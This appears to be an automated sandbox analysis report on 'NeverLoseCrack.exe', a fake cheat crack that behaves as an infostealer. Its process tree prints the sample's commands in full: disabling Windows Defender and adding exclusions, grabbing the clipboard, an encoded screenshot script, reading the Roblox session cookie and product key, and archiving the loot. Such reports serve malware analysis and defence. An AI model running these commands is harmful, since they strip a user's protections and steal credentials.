Analysis

  • max time kernel
    93s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 17:39

General

  • Target

    NeverLoseCrack.exe

  • Size

    7.5MB

  • MD5

    bd6cc5683c249bf454adedb3275dc4de

  • SHA1

    e3de1872524a0a7223673b98af03e57dff30e497

  • SHA256

    c17240a975134899ea29f3bb84e4d98464571d4f052a42c968d5d379ec8941e8

  • SHA512

    8f51d3a7b769f966bb39bae5a09f78b8fc8755fd339578aa7adcd723241b2042bd6b63198ba4d1e0d63423bcf4f67e4c009ac1b2b8298b8f02fc523df09747e5

  • SSDEEP

    196608:i6unqZ3wfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oSi:AhIH2XgHq+jq93Yov

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack.exe
    "C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3508
    • C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack.exe
      "C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:516
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4700
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4932
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:448
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2196
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2720
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4572
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2576
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1092
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:3296
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4604
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:3584
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1164
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:3684
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3148
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:4436
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‌.scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4528
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‌.scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1772
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1684
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1788
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4956
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2624
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4192
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:4688
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              • Suspicious use of WriteProcessMemory
              PID:4484
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:4808
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5088
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2348
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5096
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:1176
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "systeminfo"
                3⤵
                  PID:4344
                  • C:\Windows\system32\systeminfo.exe
                    systeminfo
                    4⤵
                    • Gathers system information
                    PID:952
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                  3⤵
                    PID:2556
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4004
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wx1pilcf\wx1pilcf.cmdline"
                        5⤵
                          PID:2748
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB333.tmp" "c:\Users\Admin\AppData\Local\Temp\wx1pilcf\CSCB3357C2B74274D209F78DAE9A3F644E0.TMP"
                            6⤵
                              PID:2696
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:3040
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:2608
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:1104
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:1324
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:3096
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:4996
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:1932
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:2576
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:3304
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:3512
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                            3⤵
                                              PID:2400
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3348
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                              3⤵
                                                PID:1208
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                  4⤵
                                                    PID:2992
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                  3⤵
                                                    PID:4048
                                                    • C:\Windows\system32\getmac.exe
                                                      getmac
                                                      4⤵
                                                        PID:2308
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35082\rar.exe a -r -hp"n" "C:\Users\Admin\AppData\Local\Temp\r0fCv.zip" *"
                                                      3⤵
                                                        PID:4988
                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI35082\rar.exe
                                                          C:\Users\Admin\AppData\Local\Temp\_MEI35082\rar.exe a -r -hp"n" "C:\Users\Admin\AppData\Local\Temp\r0fCv.zip" *
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:3588
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                        3⤵
                                                          PID:4484
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic os get Caption
                                                            4⤵
                                                              PID:968
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                            3⤵
                                                              PID:4996
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic computersystem get totalphysicalmemory
                                                                4⤵
                                                                  PID:4548
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                3⤵
                                                                  PID:1320
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic csproduct get uuid
                                                                    4⤵
                                                                      PID:3412
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                    3⤵
                                                                      PID:764
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3912
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                      3⤵
                                                                        PID:4528
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic path win32_VideoController get name
                                                                          4⤵
                                                                          • Detects videocard installed
                                                                          PID:4852
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                        3⤵
                                                                          PID:3216
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                            4⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2320

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                                      SHA1

                                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                      SHA256

                                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                      SHA512

